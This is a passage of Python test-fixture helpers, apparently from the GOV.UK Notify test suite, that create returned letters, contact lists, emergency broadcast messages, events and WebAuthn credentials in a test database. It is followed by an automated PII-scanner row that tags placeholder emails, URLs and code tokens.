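#   fixtures['service_1_sms_and_letter']      # service billed for both SMS and letters
#   fixtures['org_for_service_with_letters']  # organisation owning the letters-only service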
def create_returned_letter(service=None, reported_at=None, notification_id=None):
if not service:
service = create_service(service_name='a - with sms and letter')
returned_letter = ReturnedLetter(
service_id=service.id,
reported_at=reported_at or datetime.utcnow(),
notification_id=notification_id or uuid.uuid4(),
created_at=datetime.utcnow(),
)
db.session.add(returned_letter)
db.session.commit()
return returned_letter
def create_service_contact_list(
service=None,
original_file_name='EmergencyContactList.xls',
row_count=100,
template_type='email',
created_by_id=None,
archived=False,
):
if not service:
service = create_service(service_name='service for contact list', user=create_user())
contact_list = ServiceContactList(
service_id=service.id,
original_file_name=original_file_name,
row_count=row_count,
template_type=template_type,
created_by_id=created_by_id or service.users[0].id,
created_at=datetime.utcnow(),
archived=archived,
)
db.session.add(contact_list)
db.session.commit()
return contact_list
def create_broadcast_message(
template=None,
*,
service=None, # only used if template is not provided
created_by=None,
personalisation=None,
content=None,
status=BroadcastStatusType.DRAFT,
starts_at=None,
finishes_at=None,
areas=None,
stubbed=False
):
if template:
service = template.service
template_id = template.id
template_version = template.version
personalisation = personalisation or {}
content = template._as_utils_template_with_personalisation(
personalisation
).content_with_placeholders_filled_in
elif content:
template_id = None
template_version = None
personalisation = None
content = content
else:
pytest.fail('Provide template or content')
broadcast_message = BroadcastMessage(
service_id=service.id,
template_id=template_id,
template_version=template_version,
personalisation=personalisation,
status=status,
starts_at=starts_at,
finishes_at=finishes_at,
created_by_id=created_by.id if created_by else service.created_by_id,
areas=areas or {'areas': [], 'simple_polygons': []},
content=content,
stubbed=stubbed
)
db.session.add(broadcast_message)
db.session.commit()
return broadcast_message
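# Exactly one of template or content must be provided (illustrative calls):
#   create_broadcast_message(template=some_template)       # content rendered from the template
#   create_broadcast_message(service=svc, content='hi')    # raw content, no template
# Passing neither fails the test via pytest.fail('Provide template or content').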
def create_broadcast_event(
broadcast_message,
sent_at=None,
message_type='alert',
transmitted_content=None,
transmitted_areas=None,
transmitted_sender=None,
transmitted_starts_at=None,
transmitted_finishes_at=None,
):
b_e = BroadcastEvent(
service=broadcast_message.service,
broadcast_message=broadcast_message,
sent_at=sent_at or datetime.utcnow(),
message_type=message_type,
transmitted_content=transmitted_content or {'body': 'this is an emergency broadcast message'},
transmitted_areas=transmitted_areas or broadcast_message.areas,
transmitted_sender=transmitted_sender or 'www.notifications.service.gov.uk',
transmitted_starts_at=transmitted_starts_at,
transmitted_finishes_at=transmitted_finishes_at or datetime.utcnow() + timedelta(hours=24),
)
db.session.add(b_e)
db.session.commit()
return b_e
def create_broadcast_provider_message(
broadcast_event,
provider,
status='sending'
):
broadcast_provider_message_id = uuid.uuid4()
provider_message = BroadcastProviderMessage(
id=broadcast_provider_message_id,
broadcast_event=broadcast_event,
provider=provider,
status=status,
)
db.session.add(provider_message)
db.session.commit()
provider_message_number = None
if provider == BroadcastProvider.VODAFONE:
provider_message_number = BroadcastProviderMessageNumber(
broadcast_provider_message_id=broadcast_provider_message_id)
db.session.add(provider_message_number)
db.session.commit()
return provider_message
def create_webauthn_credential(
user,
name='my key',
*,
credential_data='ABC123',
registration_response='DEF456',
):
webauthn_credential = WebauthnCredential(
user=user,
name=name,
credential_data=credential_data,
registration_response=registration_response
)
db.session.add(webauthn_credential)
db.session.commit()
return webauthn_credential
| 41,713 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['MEDICAL_LICENSE', 'ee9390147'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2021-03-01'], ['URL', 'https://sns.eu-west-1.amazonaws.com'], ['URL', 'https://sns.pe'], ['URL', 'https://sns.eu-west-1.amazonaws.com'], ['URL', 'https://sns.pe'], ['URL', 'https://sns.eu-west-1.amazonaws.com'], ['URL', 'https://sns.pe'], ['URL', "https://sns.eu-west-1.amazonaws.com/SimpleNotificationService-bb750'"], ['URL', "https://sns.eu-west-1.amazonaws.com/?Action=Unsubscribe&S'"], ['DATE_TIME', 'LETTER_TYPE'], ['PERSON', 'ReturnedLetter'], ['LOCATION', 'save_model_user(user'], ['PERSON', 'crown=True'], ['PERSON', 'crown=crown'], ['PERSON', 'sms_sender = ServiceSmsSender.query.filter_by(service_id='], ['PERSON', 'sms_sender = ServiceSmsSender.query.filter_by(service_id='], ['DATE_TIME', 'SMS_TYPE'], ['PERSON', 'to_field'], ['DATE_TIME', 'SMS_TYPE'], ['PERSON', 'billable_units=1'], ['PERSON', 'service_id'], ['PERSON', 'create_inbound_sms'], ['LOCATION', 'service.inbound_number'], ['LOCATION', 'service_inbound_api'], ['PERSON', 'save_service_callback_api(service_callback_api'], ['PERSON', "post_class='second"], ['PERSON', 'crown=crown'], ['LOCATION', 'create_api_key(service'], ['PERSON', "provider='mmg"], ['PERSON', 'organisation_id'], ['LOCATION', 'sorted_count=0'], ['LOCATION', 'messages_total=35'], ['LOCATION', 'EMAIL_TYPE'], ['DATE_TIME', "2018-06-05T14:00:15.952Z'"], ['DATE_TIME', "2018-06-05T14:00:15.952Z'"], ['DATE_TIME', "2018-06-05T14:00:15.952Z'"], ['DATE_TIME', '2016-03-14T12:35:26.665Z",\\n'], ['URL', 'dd426d95ee9390147a5624348ee.pe'], ['PERSON', 'invited_user = InvitedUser(**data'], ['DATE_TIME', 'year\n '], ['PERSON', 'org_1 = create_organisation'], ['LOCATION', 'billable_unit=3'], ['LOCATION', 'rate=.50'], ['LOCATION', 'notifications_sent=8'], ['LOCATION', 'notifications_sent=7'], ['LOCATION', 'notifications_sent=8'], ['LOCATION', 'rate=.50'], ['DATE_TIME', 'year\n '], ['DATE_TIME', 'year\n '], ['PERSON', 'ReturnedLetter'], ['NRP', 'contact_list'], ['PERSON', 'message_type=message_type'], ['LOCATION', 'broadcast_message.areas'], ['URL', 'https://something.com'], ['URL', 'https://something.com'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'app.dao.in'], ['URL', 'app.dao.in'], ['URL', 'app.dao.in'], ['URL', 'app.dao.jo'], ['URL', 'app.dao.no'], ['URL', 'app.dao.org'], ['URL', 'app.dao.pe'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 
'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.us'], ['URL', 'app.mo'], ['URL', 'email.com'], ['URL', 'User.query.fi'], ['URL', 'service.id'], ['URL', 'user.id'], ['URL', 'dao.se'], ['URL', 'Service.query.fi'], ['URL', 'email.com'], ['URL', 'service.cr'], ['URL', 'service.ac'], ['URL', 'service.re'], ['URL', 'service.co'], ['URL', 'service.us'], ['URL', 'ServiceSmsSender.query.fi'], ['URL', 'service.id'], ['URL', 'service.id'], ['URL', 'inbound.id'], ['URL', 'ServiceSmsSender.query.fi'], ['URL', 'service.id'], ['URL', 'service.id'], ['URL', 'sender.id'], ['URL', 'service.cr'], ['URL', 'template.ar'], ['URL', 'email.com'], ['URL', 'ApiKey.query.fi'], ['URL', 'ApiKey.se'], ['URL', 'template.se'], ['URL', 'ApiKey.ke'], ['URL', 'template.se'], ['URL', 'job.id'], ['URL', 'template.service.id'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'key.id'], ['URL', 'key.ke'], ['URL', 'job.id'], ['URL', 'template.service.id'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'key.id'], ['URL', 'key.ke'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'template.cr'], ['URL', 'ServicePermission.query.al'], ['URL', 'service.in'], ['URL', 'service.id'], ['URL', 'service.ge'], ['URL', 'service.id'], ['URL', 'service.us'], ['URL', 'service.id'], ['URL', 'service.us'], ['URL', 'x2.pn'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'service.cr'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'service.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'organisation.id'], ['URL', 'email.com'], ['URL', 'Notify-20180118123.rs'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'service.id'], ['URL', 'job.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'dao.in'], ['URL', 'ServiceGuestList.fr'], ['URL', 'service.id'], ['URL', 'ServiceGuestList.fr'], ['URL', 'service.id'], ['URL', 'ServiceGuestList.fr'], ['URL', 'service.id'], ['URL', 'email.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'notification.id'], ['URL', 'service.id'], ['URL', 'datetime.no'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'email.com'], ['URL', 'someservicenotifications.service.gov.uk'], ['URL', 'notifications.service.gov.uk'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'someservicenotifications.service.gov.uk'], ['URL', 'notifications.service.gov.uk'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'someservicenotifications.service.gov.uk'], ['URL', 'notifications.service.gov.uk'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'a6-238.smtp-out.eu-west-1.amazonses.com'], ['URL', 'service.id'], ['URL', 'email.com'], ['URL', 'service.us'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'date.st'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'letter.id'], 
['URL', 'letter.na'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', '1.id'], ['URL', 'emails.na'], ['URL', '2.id'], ['URL', 'letters.na'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'letters.id'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'org.id'], ['URL', 'allowance.id'], ['URL', 'service.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'service.id'], ['URL', 'service.us'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'service.id'], ['URL', 'by.id'], ['URL', 'service.cr'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'message.se'], ['URL', 'message.ar'], ['URL', 'www.notifications.service.gov.uk'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com']] |